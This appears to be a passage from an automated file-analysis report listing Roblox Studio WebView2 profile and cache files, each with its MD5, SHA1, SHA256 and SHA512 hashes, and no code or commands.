SHA512 dca3cf3eb1d59335d0ee202d96726e0b42ea2da925493e9a0eaf5389f93f7d9884b244d45fecde1a548fd4ad0b648fb2248a59d9aa1efb55e15eb8faafb3a083

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Crashpad\settings.dat

MD5 f6d8cc0cbb2389c58d50fd287e8c0c3d
SHA1 d03b19066113b2ebad2dce212e9b3d0ecd703024
SHA256 9729a21d9de42b6a09772bbc51d38073536f380551dc1200a97365c090e8f21b
SHA512 7cc58bf88f66e35019c4ab38f5aff3d10757b78c266a0aa625b99a74abf6e17b303c7f6fdb77a540e194655ccd6ede2511cdaa52567edd1b8646dbe229345508

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Sync Data\LevelDB\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Local State

MD5 8a580600bd1b62ee582825d721e2b92e
SHA1 511a565a322e1bef7fffd82890fb2efc73c35e5f
SHA256 e7b7caa1b3f171507a419e46e5b893aa994843fe15a570eb74e0d47d543a2f20
SHA512 858385356e38a4d8e4e0c01410454f61d7834c0f8b413786b294ef0f8957aafd36d1520e8bbbbb7dd98ae49202d7eb1302ea68ef70ca9888dfe6d2f0365e4b7f

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Sync Data\LevelDB\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Local State

MD5 c0977e1329a811878a4994c8d772986d
SHA1 4ea18625273d20c417be7a797568deb642934eb1
SHA256 4e82577f77aecdba25584c81787e78ecc8b636ffe9df792cb7b3f09739e973d6
SHA512 19bb6ca69751b5fb7e0ff7e836386ec098854a6b7906106dd554bb2e12a725c7dd246a520b14b12fe1c916b9b892b6ab9cbadc241a5a80426a47f96bcc5a9b88

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Local State~RFe6072b3.TMP

MD5 cd4ddd3b7c931ef1828073049930521e
SHA1 023fb57a0f5be04205367ae0f14b44ce3598cc05
SHA256 bd22de1154e2f3b10595c45847d8b6941b03b476b3e6272a186f7bcf6020fc1b
SHA512 429d0a55ef5f2f42b24c173e58d1b20200721b6bfe880f4514b5ea0fdda05652b02f8e5eb46d01bcd80c22bd843d25185cde6a5e3c07238d0f1578dc46b4cda3

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\GrShaderCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\GrShaderCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\GrShaderCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_00000c

MD5 e1f6e032096b2924e561c3928b9dc73d
SHA1 f33a3bb1b04f04ed1b93b13d21b6b3ce529690ad
SHA256 fa802b853572d8a40ee939940d0cd9562ea8f5954c0522b0777e01fcb546c3c8
SHA512 b13f6e1f984d28c5f4cfc4ae2298b321c314892cab1e5ccd6f1f61ec98d8c1a39669078c88ba541c91648963abc6e16e0a1cdb4e9449b4be16927e9bad8d0f37

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_000012

MD5 759ab24cf5846f06c5cdb324ee4887ea
SHA1 41969c5b737bc40bbb54817da755e3aa7d02f3c6
SHA256 7037e6c967c38477a5fcd583c74892e16b7a9066cd60287c7035bf0760d05471
SHA512 3470ae07eb7c54feee1e791e63a365cfb0da42f570a66e6c84faf5db6bf8395173c6cb60e8c5cf28eae409f26ea5433c3c5d6ea32eb07e5997c979c6e3ccf4be

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_000018

MD5 b715a5dd019d1b8771a3031ff85c972b
SHA1 5768744eb85d3137d094458e4b7842c1c5c526cd
SHA256 e9ca7a8587bb3674824a28a8a80836e3483dc3bbe97c658bf7c984c5b424920a
SHA512 22e09e48a13ced3a3cd95a5f40b5e9ccbbad8abbd0d6af7dd4e411d63c662b09f1ad2453909a6c7a0d0ce34f250f2fbf0d7f076dced281f133ab7f21d2008d1a

C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_00001a

MD5 cc7ad65e0558327d8fbe8ade40ab94e8
SHA1 6c153e9bf971f196db25cb2cb3b62f77f0a1299a
SHA256 956e1fd407995ff1ecca3bf42ca0d01086edc7eb6a965e1d9d4a48f197a8bd30
SHA512 0af63a7bb1151ef7564472b90ddd766857e3fd78973195817aa751d97093558688733876114ea7341063c7f1bc01f90aba1016980ce2c009a0cc399f40614377